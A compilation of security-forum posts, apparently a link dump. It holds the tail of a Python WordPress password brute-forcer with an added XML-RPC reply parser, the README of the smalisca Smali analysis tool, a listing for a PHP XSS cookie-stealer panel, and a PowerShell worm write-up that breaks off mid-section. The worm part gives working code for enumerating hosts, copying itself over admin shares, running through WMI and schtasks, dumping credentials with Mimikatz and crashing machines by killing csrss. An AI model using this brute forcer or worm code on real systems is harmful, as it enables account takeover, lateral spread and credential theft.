Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (X11; Ubuntu; Linux 
i686; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 
6.1; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
    UA = random.choice(userAgent)
    return UA

def urlCMS(url,brutemode):
    if url[:8] != "https://" and url[:7] != "http://":
        print('\n[X] You must insert http:// or https:// protocol')
        os._exit(1)
    # Page login
    if brutemode == "std":
        url = url+'/wp-login.php'
    else:
        url = url+'/xmlrpc.php'
    return url

def bodyCMS(username,pwd,brutemode):
    if brutemode == "std":
        body = {
            'log':username,
            'pwd':pwd,
            'wp-submit':'Login',
            'testcookie':'1'
        }
    else:
        body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName> <params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd)
    return body

def headersCMS(UA,lenbody,brutemode):
    if brutemode == "std":
        headers = {
            'User-Agent': UA,
            'Content-type': 'application/x-www-form-urlencoded',
            'Cookie': 'wordpress_test_cookie=WP+Cookie+check'
        }
    else:
        headers = {
            'User-Agent': UA,
            'Content-type': 'text/xml',
            'Content-Length': "%d" % len(lenbody)
        }
    return headers

def responseCMS(response):
    # A successful wp-login.php POST sets the auth cookies (last attribute "httponly");
    # .get() so a reply without Set-Cookie counts as a failed login instead of a KeyError
    if response.get('set-cookie', '').split(" ")[-1] == "httponly":
        return "1"

def connection(url,user,password,UA,timeout,brutemode):
    username = user
    pwd = password
    http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)
    # HTTP POST Data
    body = bodyCMS(username,pwd,brutemode)
    # Headers
    headers = headersCMS(UA,body,brutemode)
    try:
        if brutemode == "std":
            response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
            if str(response.status)[0] == "4" or str(response.status)[0] == "5":
                print('[X] HTTP error, code: '+str(response.status))
                os._exit(1)
            if responseCMS(response) == "1":
                print('\n')
                print('[!] Password FOUND!!!')
                print('')
                print('[!] Username: '+user+' Password: '+password)
                os._exit(0)
            checkCon = "OK"
            return checkCon
        else:
            response, content = http.request(url, 'POST', headers=headers, body=body)
            if str(response.status)[0] == "4" or str(response.status)[0] == "5":
                print('[X] HTTP error, code: '+str(response.status))
                os._exit(1)
            # Remove all blank and newline chars
            xmlcontent = content.replace(" ", "").replace("\n","")
            # wp.getUsersBlogs answers a bad login with an XML-RPC fault, faultCode 403
            if not "403" in xmlcontent:
                print('\n')
                print('[!] Password FOUND!!!')
                print('')
                print('[!] Username: '+user+' Password: '+password)
                os._exit(0)
            checkCon = "OK"
            return checkCon
    except socket.timeout:
        print('[X] Connection Timeout')
        os._exit(1)
    except socket.error:
        print('[X] Connection Refused')
        os._exit(1)
    except httplib.ResponseNotReady:
        print('[X] Server Not Responding')
        os._exit(1)
    except httplib2.ServerNotFoundError:
        print('[X] Server Not Found')
        os._exit(1)
    except httplib2.HttpLib2Error:
        print('[X] Connection Error!!')
        os._exit(1)

commandList = argparse.ArgumentParser(sys.argv[0])
commandList.add_argument('-S', '--standard', action="store_true", dest="standard", help="Standard login brute", )
commandList.add_argument('-X', '--xml-rpc', action="store_true", dest="xml", help="Xml-rpc login brute", )
commandList.add_argument('-t', '--target', action="store", dest="target", help="Insert URL: http://www.victimurl.com[:port]", )
commandList.add_argument('-u', '--username', action="store", dest="username", help="Insert username", )
commandList.add_argument('-w', '--wordfilelist', action="store", dest="wordfilelist", help="Insert wordlist file", )
commandList.add_argument('--timeout', action="store", dest="timeout", default=10, type=int, help="Timeout Value (Default 10s)", )
options = commandList.parse_args()

# Check bruteforce mode conflicts
if options.standard and options.xml:
    print "\n[X] Select standard [-S] OR xml-rpc [-X] bruteforce mode"
    sys.exit(1)

# Check args (print_help() writes to stdout itself, so it is not wrapped in print)
if not options.standard and not options.xml:
    print(banner)
    commandList.print_help()
    sys.exit(1)
elif not options.target or not options.username or not options.wordfilelist:
    print(banner)
    commandList.print_help()
    sys.exit(1)

# Set bruteforce mode
if options.standard:
    brtmd="std"
else:
    brtmd="xml"

# args to vars
url = options.target
user = options.username
password = options.wordfilelist
timeout = options.timeout

# Check if Wordlist file exists and is readable ("or": either failure is fatal)
if not os.path.isfile(password) or not os.access(password, os.R_OK):
    print "[X] Wordlist file is missing or is not readable"
    sys.exit(1)

# Open and read Wordlist file
wordlist = open(password).read().split("\n")
# Remove the trailing empty entry left by a final newline (only if there is one)
if wordlist and wordlist[-1] == "":
    del wordlist[-1]
# Total lines (password) in Wordlist file
totalwordlist = len(wordlist)
# Gen Random UserAgent
UA = randomAgentGen()
# Url to url+login_cms_page
url = urlCMS(url,brtmd)

print(banner)
print
print('[+] Target.....: '+options.target)
print('[+] Wordlist...: '+str(totalwordlist))
print('[+] Username...: '+user)
if brtmd == "std":
    print('[+] BruteMode..: Standard')
else:
    print('[+] BruteMode..: Xml-Rpc')
print('[+]')
print('[+] Connecting.......')
print('[+]')

# Check connection with fake-login (the random user agent doubles as a throw-away password)
if connection(url,user,UA,UA,timeout,brtmd) == "OK":
    print('[+] Connection established')
    # Reset var for "progress bar"
    count = 0
    threads = []
    for pwd in wordlist:
        count += 1
        t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd))
        t.start()
        threads.append(t)
        sys.stdout.write('\r')
        sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))
        sys.stdout.flush()
        sleep(0.210)
    for a in threads:
        a.join()

# no passwords found
print('\n[X] Password NOT found ')

WordPress Brute Forcer 2.0 - Packet Storm
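The xml-rpc mode above decides "password found" whenever the substring "403" is missing from the reply. The following is an added example (not part of the Packet Storm script) that parses the XML-RPC envelope with the standard library instead, so a wp.getUsersBlogs reply is classified by its fault code. The sample replies are constructed by hand from the XML-RPC fault format and the WordPress fault codes 403 (bad credentials) and 405 (XML-RPC disabled); they are not captured traffic, and the blog URL is invented.

```python
# Added example, not part of the WordPress Brute Forcer script: classify a
# WordPress xmlrpc.php reply to wp.getUsersBlogs by parsing the XML-RPC
# envelope instead of testing whether the substring "403" is absent.
import xmlrpc.client

# Constructed sample replies (hand-written, not captured from a live server).
FAULT_403 = (
    '<?xml version="1.0"?><methodResponse><fault><value><struct>'
    '<member><name>faultCode</name><value><int>403</int></value></member>'
    '<member><name>faultString</name><value><string>Incorrect username or password.'
    '</string></value></member></struct></value></fault></methodResponse>'
)
# Same envelope, but the fault WordPress returns when XML-RPC is switched off.
FAULT_405 = FAULT_403.replace('<int>403</int>', '<int>405</int>').replace(
    'Incorrect username or password.', 'XML-RPC services are disabled on this site.')
# A successful login: an array of blog structs.
SUCCESS = (
    '<?xml version="1.0"?><methodResponse><params><param><value><array><data>'
    '<value><struct><member><name>blogid</name><value><string>1</string></value></member>'
    '<member><name>url</name><value><string>http://blog.example.test/</string></value></member>'
    '</struct></value></data></array></value></param></params></methodResponse>'
)
# A successful login whose (invented) blog URL happens to contain "403".
SUCCESS_WITH_403_IN_URL = SUCCESS.replace('http://blog.example.test/',
                                          'http://blog.example.test/site403/')


def build_get_users_blogs(username, password):
    """Serialise the same wp.getUsersBlogs call the script sends, via the stdlib marshaller."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")


def naive_script_check(body):
    """The script's heuristic: report 'password found' whenever '403' is absent from the reply."""
    stripped = body.replace(" ", "").replace("\n", "")
    return "403" not in stripped


def classify_xmlrpc_response(body):
    """Parse the reply and return one of:
    'valid'               - a methodResponse with params (credentials accepted)
    'invalid-credentials' - <fault> with faultCode 403
    'xmlrpc-disabled'     - <fault> with faultCode 405
    'other-fault'         - any other <fault>
    'malformed'           - not an XML-RPC envelope at all (HTML error page, WAF block, ...)
    """
    try:
        xmlrpc.client.loads(body)          # raises Fault for a <fault> envelope
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == 403:
            return "invalid-credentials"
        if fault.faultCode == 405:
            return "xmlrpc-disabled"
        return "other-fault"
    except Exception:                      # ExpatError, ResponseError, ...
        return "malformed"
    return "valid"


if __name__ == "__main__":
    samples = [("403 fault", FAULT_403), ("405 fault", FAULT_405),
               ("success", SUCCESS), ("success, 403 in URL", SUCCESS_WITH_403_IN_URL),
               ("html page", "<html>Not Found</html>")]
    for name, body in samples:
        print("%-22s naive=%-5s parsed=%s" % (name, naive_script_check(body),
                                               classify_xmlrpc_response(body)))
```

Run stand-alone it prints the two verdicts side by side: the substring test reports a hit for the "XML-RPC disabled" fault (every guess would look like a success) and misses the valid login whose URL contains "403", while the parsed verdict gets both right.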
11. Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails

Authors: Christopher Hadnagy, Michele Fincher
Foreword by Robin Dreeke

Download: https://www.scribd.com/doc/261558462/Phishing-Dark-Waters-The-Offensive-and-Defensive-Sides-of-Malicious-Emails
12. README.rst

=========================================
Static Code Analysis for Smali
=========================================

If you have ever looked at Android applications you have learned to appreciate the ability to analyze your target at the most advanced level. Dynamic program analysis will give you a pretty good overview of your application's activities and general behaviour. However sometimes you'll want to just analyze your application **without** running it. You'll want to have a look at its components, analyze how they interact and how data is tainted from one point to another. This was the major factor driving the development of *smalisca*.

There are indeed some good reasons for a *static code analysis* before the *dynamic* one. Before interacting with the application I like to know how the application has been built, if there is any API, and generate all sorts of *call flow graphs*. In fact graphs have been very important to me since they *visualize* things. Instead of jumping from file to file, from class to class, I just look at the graphs.

While graph building has been an important reason for me to code such a tool, *smalisca* has some other neat **features** you should read about.

Features
========

At the moment there are a few major functionalities like:

* **parsing**

  You can parse a whole directory of **Smali** files and **extract**:

  * class information
  * class properties
  * class methods
  * calls between methods of different classes

  You can then **export** the results as **JSON** or **SQLite**. Have a look at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for more information.

* **analyzing**

  After exporting the results you'll get an **interactive prompt** to take a closer look at your parsed data. You can **search** for classes, properties, methods and even method calls.
  You can then apply several **filters** to your search criteria like::

      smalisca> sc -c class_name -p test -r 10 -x path -s class_type

  This command will search for *10* (-r 10) classes which contain the pattern *test* (-p) in their *class name* (-c). Afterwards the command will exclude the column *path* (-x path) from the results and sort them by the *class type* (-s).

  Let's have a look at another example::

      smalisca> scl -fc com/android -fm init -r 10

  This will search for all **method calls** whose *calling* class name contains the pattern *com/android* (-fc). Additionally we can look for calls originating from methods whose name contains the pattern *init* (-fm).

  You can of course read your commands from a file and analyze your results in a *batch*-like manner::

      $ cat cmd.txt
      sc -c class_name -p com/gmail/xlibs -r 10 -x path
      quit
      $ ./smalisca.py analyzer -i results.sqlite -f sqlite -c cmd.txt
      ...

  Have a look at the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more information.

* **visualizing**

  I think this is the **most** valuable feature of *smalisca*. The ability to visualize your results in a structured way makes your life more comfortable. Depending on what you're interested in, this tool has several graph drawing features I'd like to promote.

  At first you can draw your packages including their classes, properties and methods::

      smalisca> dc -c class_name -p test -f dot -o /tmp/classes.dot
      :: INFO       Wrote results to /tmp/classes.dot
      smalisca>

  This will first search classes whose class name contains *test* and then export the results in the **Graphviz DOT** language. You can then manually generate a graph using *dot*, *neato*, *circo* etc. Or you do that using the interactive prompt::

      smalisca> dc -c class_name -p test -f pdf -o /tmp/classes.pdf --prog neato
      :: INFO       Wrote results to /tmp/classes.pdf
      smalisca>

  Have a look at the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for more information.
Screenshots
===========

.. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_search_classes.png
   :scale: 99%
   :alt: Basic usage

   Output results as table.

.. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_dxcl_dot_0.png
   :scale: 99%
   :alt: Cross calls

   Basic relationships between classes and modules.

Have a look at the `screenshots page <http://smalisca.readthedocs.org/en/latest/screenshots.html>`_.

Installation
============

Refer to the `installation page <http://smalisca.readthedocs.org/en/latest/installation.html>`_.

Requirements:

* Python (2.x / 3.x)
* `cement <http://builtoncement.com/>`_
* Graphviz
* SQLAlchemy

How to use it
=============

After installing the tool, you may want to first pick up an Android application (APK) to play with. Use `apktool <https://code.google.com/p/android-apktool/>`_ or my own tool `ADUS <https://github.com/dorneanu/adus>`_ to dump the APK's content. For the sake of simplicity I'll be using **FakeBanker** which I've analyzed in a previous `blog post <http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/>`_.

First touch
-----------

But first let's have a look at the tool's main options::

    $ smalisca --help
    (ASCII-art "smalisca" banner)
    --------------------------------------------------------------------------------
    :: Author: Victor <Cyneox> Dorneanu
    :: Desc: Static Code Analysis tool for Smali files
    :: URL: http://nullsecurity.net, http://{blog,www}.dornea.nu
    :: Version: 1.0
    --------------------------------------------------------------------------------
    usage: smalisca.py (sub-commands ...) [options ...] {arguments ...} [--]

    Static Code Analysis (SCA) tool for Baksmali (Smali) files.
    commands:

      analyzer
        [--] Analyze results using an interactive prompt or on the command line.

      parser
        [--] Parse files and extract data based on Smali syntax.

    optional arguments:
      -h, --help            show this help message and exit
      --debug               toggle debug output
      --quiet               suppress all output
      --log-level {debug,info,warn,error,critical}
                            Change logging level (Default: info)
      -v, --version         show program's version number and exit

Parsing
-------

I'll first **parse** some directory for **Smali** files before doing the analysis stuff::

    $ smalisca parser -l ~/tmp/FakeBanker2/dumped/smali -s java -f sqlite -o fakebanker.sqlite
    ...
    :: INFO       Parsing .java files in /home/victor/tmp/FakeBanker2/dumped/smali ...
    :: INFO       Finished parsing!
    :: INFO       Exporting results to SQLite
    :: INFO       Extract classes ...
    :: INFO       Extract class properties ...
    :: INFO       Extract class methods ...
    :: INFO       Extract calls ...
    :: INFO       Commit changes to SQLite DB
    :: INFO       Wrote results to fakebanker.sqlite
    :: INFO       Finished scanning

Also have a look at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for further information.

Analyzing
---------

Now you're free to do whatever you want with your generated exports. You can inspect the **SQLite DB** directly or use *smalisca's* **analysis** features::

    $ smalisca analyzer -f sqlite -i fakebanker.sqlite
    ...
    smalisca> sc -x path -r 10
    +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
    | id | class_name                                                                              | class_type         | class_package            | depth |
    +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
    | 1  | Landroid/support/v4/net/ConnectivityManagerCompat                                       | public             | Landroid.support.v4.net  | 5     |
    | 2  | Landroid/support/v4/view/AccessibilityDelegateCompat$AccessibilityDelegateJellyBeanImpl |                    | Landroid.support.v4.view | 5     |
    | 3  | Landroid/support/v4/view/ViewCompat$ViewCompatImpl                                      | interface abstract | Landroid.support.v4.view | 5     |
    | 4  | Landroid/support/v4/app/ActivityCompatHoneycomb                                         |                    | Landroid.support.v4.app  | 5     |
    | 5  | Landroid/support/v4/app/NoSaveStateFrameLayout                                          |                    | Landroid.support.v4.app  | 5     |
    | 6  | Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2                           |                    | Landroid.support.v4.net  | 5     |
    | 7  | Lcom/gmail/xpack/BuildConfig                                                            | public final       | Lcom.gmail.xpack         | 4     |
    | 8  | Landroid/support/v4/app/BackStackRecord$Op                                              | final              | Landroid.support.v4.app  | 5     |
    | 9  | Landroid/support/v4/app/FragmentManagerImpl                                             | final              | Landroid.support.v4.app  | 5     |
    | 10 | Landroid/support/v4/app/ShareCompat$ShareCompatImpl                                     | interface abstract | Landroid.support.v4.app  | 5     |
    +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+

Also refer to the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more available **commands** and options.

Drawing
-------

Please refer to the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for full examples.

License
=======

*smalisca* has been released under the **MIT** license. Have a look at the **LICENSE.rst** file.

Credits
=======

This tool is dedicated to **Lic?**.
Many thanks also go to:

* `Stephen McAllister <https://de.linkedin.com/pub/stephen-mcallister/13/843/71a>`_

  * Many thanks for all those hours full of APK debugging and great ideas

* My gf

  * Thank you very much for your patience and understanding!

* `nullsecurity.net <http://nullsecurity.net>`_

  * Hack the planet!

Download: smalisca-0.1.tar.gz
Description: Static Code Analysis tool for Smali files.
MD5: 943930dbd144c52635f3d5b874482d3a
Author: Cyneox
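To show what the "parsing" step of the README actually has to pull out of Smali, here is an added example (my own illustration, not smalisca's code) of a minimal parser for the constructs the README names: the ``.class`` header, ``.field`` and ``.method`` declarations and ``invoke-*`` call sites. It derives the same class_name / class_type / class_package / depth columns as the ``sc`` output above (depth taken as the number of ``/``-separated segments, which matches the table) and a search in the spirit of ``scl -fc ... -fm ...``. The Smali input is constructed by hand to look like apktool output; it is not taken from FakeBanker.

```python
# Added example, not smalisca's own code: a minimal parser for the Smali
# constructs smalisca extracts (class header, fields, methods, invoke-* calls),
# producing the class_name / class_type / class_package / depth columns
# shown in the README's `sc` output, plus an `scl`-style call search.
import re
from dataclasses import dataclass, field

# Constructed sample Smali (hand-written; not real FakeBanker output).
SAMPLE_SMALI = """\
.class public final Lcom/gmail/xpack/BuildConfig;
.super Ljava/lang/Object;
.source "BuildConfig.java"

.field public static final DEBUG:Z = false

.method public constructor <init>()V
    .locals 0
    invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    return-void
.end method

.method public static sendData(Landroid/content/Context;)V
    .locals 2
    invoke-static {p0}, Lcom/gmail/xpack/Net;->post(Landroid/content/Context;)V
    invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
    return-void
.end method
"""

# Access/attribute keywords: public, static, final, interface, abstract, constructor, ...
MODS = r'(?P<mods>(?:[a-z-]+\s+)*)'
CLASS_RE = re.compile(r'^\.class\s+' + MODS + r'(?P<name>L[^;\s]+);')
FIELD_RE = re.compile(r'^\.field\s+' + MODS + r'(?P<name>[^:\s]+):(?P<type>\S+)')
METHOD_RE = re.compile(r'^\.method\s+' + MODS + r'(?P<name>[^(\s]+)\((?P<args>[^)]*)\)(?P<ret>\S+)')
INVOKE_RE = re.compile(r'^invoke-(?P<kind>[a-z/]+)\s+\{[^}]*\},\s*(?P<cls>L[^;]+);->(?P<method>[^(]+)\(')


@dataclass
class MethodInfo:
    name: str
    mods: str
    args: str
    ret: str


@dataclass
class ClassInfo:
    class_name: str
    class_type: str
    class_package: str
    depth: int
    superclass: str = ""
    fields: list = field(default_factory=list)    # (name, type, mods)
    methods: list = field(default_factory=list)   # MethodInfo
    calls: list = field(default_factory=list)     # (from_method, to_class, to_method)


def parse_smali(text):
    """Parse one or more concatenated .smali files into ClassInfo records."""
    classes, current, cur_method = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CLASS_RE.match(line)
        if m:
            name = m.group("name")
            parts = name.split("/")              # Lcom/gmail/xpack/BuildConfig -> 4 segments
            current = ClassInfo(class_name=name, class_type=m.group("mods").strip(),
                                class_package=".".join(parts[:-1]), depth=len(parts))
            classes.append(current)
            cur_method = None
        elif current is None:
            continue                              # directives before any .class header
        elif line.startswith(".super "):
            current.superclass = line.split()[1].rstrip(";")
        elif (m := FIELD_RE.match(line)):
            current.fields.append((m.group("name"), m.group("type"), m.group("mods").strip()))
        elif (m := METHOD_RE.match(line)):
            cur_method = MethodInfo(m.group("name"), m.group("mods").strip(),
                                    m.group("args"), m.group("ret"))
            current.methods.append(cur_method)
        elif line == ".end method":
            cur_method = None
        elif cur_method and (m := INVOKE_RE.match(line)):
            current.calls.append((cur_method.name, m.group("cls"), m.group("method")))
    return classes


def search_classes(classes, pattern="", limit=10):
    """Like `sc -c class_name -p <pattern> -r <limit>`: classes whose name contains pattern."""
    return [c for c in classes if pattern in c.class_name][:limit]


def search_calls(classes, from_class="", from_method=""):
    """Like `scl -fc <pattern> -fm <pattern>`: calls whose calling class/method contain the patterns."""
    hits = []
    for c in classes:
        if from_class in c.class_name:
            hits.extend((c.class_name, src, dst_cls, dst_m)
                        for src, dst_cls, dst_m in c.calls if from_method in src)
    return hits


if __name__ == "__main__":
    for c in parse_smali(SAMPLE_SMALI):
        print(c.class_name, "|", c.class_type, "|", c.class_package, "|", c.depth)
        for call in c.calls:
            print("   call:", call)
```

A real run would feed every ``.smali`` file under the apktool output directory to ``parse_smali``; the records map directly onto the classes / properties / methods / calls tables the README says smalisca exports.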
13. Cookies Manager

Author: Doddy Hackman

A simple program in PHP to help with XSS vulnerabilities. The features of this program are the following:

[+] Cookie stealer with TinyURL generator
[+] You can see the cookies that a page sends back
[+] You can create cookies with the information you want
[+] Hidden login: to enter the panel, use ?poraca to find the login

A video with examples of use:

Download

Source: https://github.com/DoddyHackman/Cookies_Manager
  14. https://rstforums.com/forum/35905-370-links.rst
15. update, approx. 20k https://www.sendspace.com/file/5v8ix9 pwd: cnN0Zm9ydW1zLmNvbQ== Enjoy!
16. TL;DR: Another PowerShell worm here.

Recently, I was approached with a few ideas about worms to test the potential to detect/stop such. This, and reading some interesting posts about PowerShell based worm(s), pushed me to attempt to build a worm with a slightly different take. One of the requirements of this worm is to propagate without certainty of an external connection or not to the internet. This is important if the worm is to jump across an airgapped network somehow or if the command and control is severed. Also, attempting to dump creds and setting some sort of persistence would be a plus. Lastly, the whole thing (or as much as possible) should be written in PowerShell, so the option of base64 encoding it and running it in memory is present.

Target enumeration

This is a pick-your-own-adventure technique. First, the worm will need to identify potential targets to spread to. The worm uses 3 techniques (others may exist) to enumerate targets:

- Dump domain hosts
- grab local class C
- grab IPs from netstat

As annotated in an earlier post, we can cycle domain hosts pretty easily if we are logged into a domain via:

function getDomain {
    $final = @()
    #get Domain computers
    $strCategory = "computer"
    $objDomain = New-Object System.DirectoryServices.DirectoryEntry
    $objSearcher = New-Object System.DirectoryServices.DirectorySearcher
    $objSearcher.SearchRoot = $objDomain
    $objSearcher.Filter = ("(objectCategory=$strCategory)")
    $colProplist = "name", "cn"
    foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
    $colResults = $objSearcher.FindAll()
    foreach ($objResult in $colResults) {
        $objComputer = $objResult.Properties
        $bleh = $objComputer.name
        $final += $bleh
    }
    return $final
}

But what if the victim host isn't a part of a domain? This will fail, so error handling will be useful here (see final version at the top of the page). The next attempt to enumerate hosts is a class C brute force.
To set this up, the worm needs to know the current IP address of the machine we are on, a la:

$enum = Get-WMIObject win32_NetworkAdapterConfiguration |
    Where-Object { $_.IPEnabled -eq $true } |
    Foreach-Object { $_.IPAddress } |
    Foreach-Object { [IPAddress]$_ } |
    Where-Object { $_.AddressFamily -eq 'Internetwork' } |
    Foreach-Object { $_.IPAddressToString }

Then, the worm parses the first 3 octets and runs through a for loop (assumes /24 at the moment):

function getClassC{
    Param($ip);
    $final = @()
    $classC = $ip.Split(".")[0]+"."+$ip.Split(".")[1]+"."+$ip.Split(".")[2]
    for($i=1; $i -lt 255; $i++) {
        # the "." separator is needed: without it "192.168.1" + "1" yields "192.168.11"
        $final += $classC + "." + $i.ToString()
    }
    return $final
}

Lastly, the worm will try a netstat "hail mary":

#//netstat mode
$n = netstat -ano
foreach ($n2 in $n) {
    $n4 = $n2.Split(" ")
    foreach ($n3 in $n4) {
        $n5 = $n3.Split(":")[0]
        if (($n5.Length -gt 7) -and ($n5.Length -lt 22)) {
            if (!( ($n5 -eq "0.0.0.0") -or ($n5 -eq $ip) -or ($n5 -eq "127.0.0.1") ) ) {
                if ($n5.Contains(".")) {
                    Write-Host $n5
                    $final += $n5
                }
            }
        }
    }
}

Spreading technique

In the testing environment, we were able to spread using the various techniques, but for simplicity we will discuss PsDrive (additional techniques may be used). The credentials used to run the worm as (or lack thereof) will dictate what is available. PsDrive can set up a PowerShell-accessible share much like net share, except that this share is only viewable in PowerShell!

Screenshot of successfully created PS-Drive that does not show up under net use.
Here, the worm sets up the PsDrive to copy files over, moves the files to the destination (via C$ in our example, but other shares may exist):

$prof = "USERPROFILE"
$profile = (get-item env:$prof).Value +"\Downloads"
$pro1 = $profile.SubString(3, $profile.Length-3)
$psdrive = "\\"+$nethost+"\C$\"+ $pro1
New-PsDrive -Name Y -PsProvider filesystem -Root $psdrive

Next, the worm (and any additional scripts) are copied over:

Copy-Item $profile\PowerW0rm.ps1 Y:\PowerW0rm.ps1
Copy-Item $profile\PowerW0rm.mof Y:\PowerW0rm.mof
Copy-Item $profile\Invoke-Mimikatz.ps1 Y:\Invoke-Mimikatz.ps1
Copy-Item $profile\bypassuac-x64.exe Y:\bypassuac-x64.exe

Finally, since this code is running in a loop, the worm removes the PsDrive:

Remove-PsDrive Y

Code Execution

In a Windows 7/Server 2008 R2 environment, Remote PowerShell isn't enabled by default. However, other options do exist depending on access level and GPO settings. The worm uses two methods of code execution: schtasks and Invoke-WMIMethod (others will exist, such as Invoke-Command). Some of the examples can be found below:

$run = "powershell -exec Bypass "+$profile+"\\PowerWorm.ps1"
$task = $profile+"\\bypassuac-x64.exe /C powershell.exe -exec Stop-Process csrss" # BSOD for a logic bomb

#run with dump creds
Invoke-WMIMethod -Class Win32_Process -Name Create -Authentication PacketPrivacy -Computername $nethost -Credential $cred -Impersonation Impersonate -ArgumentList $run

#run as current user
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList $run

#schtask example
schtasks /CREATE /S $nethost /SC Daily /MO 1 /ST 00:01 /TN "update54" /TR $task /F   #scheduled for the 1st of the year @ 00:01 AM
schtasks /RUN /TN "update54"   #Runs task immediately (kills worm, but just PoC)
schtasks /DEL /TN "update54"   #would never run in this context, but is an example

Credential Harvesting

The worm uses a call to Invoke-Mimikatz.ps1 from the PowerSploit project to dump and parse creds as it jumps from machine to machine.
This is achieved with a slight modification to the very end of Invoke-Mimikatz.ps1:

$creds = Invoke-Mimikatz -dumpcreds
Write-Host $creds

The worm first calls Invoke-Mimikatz:

#try to grab creds
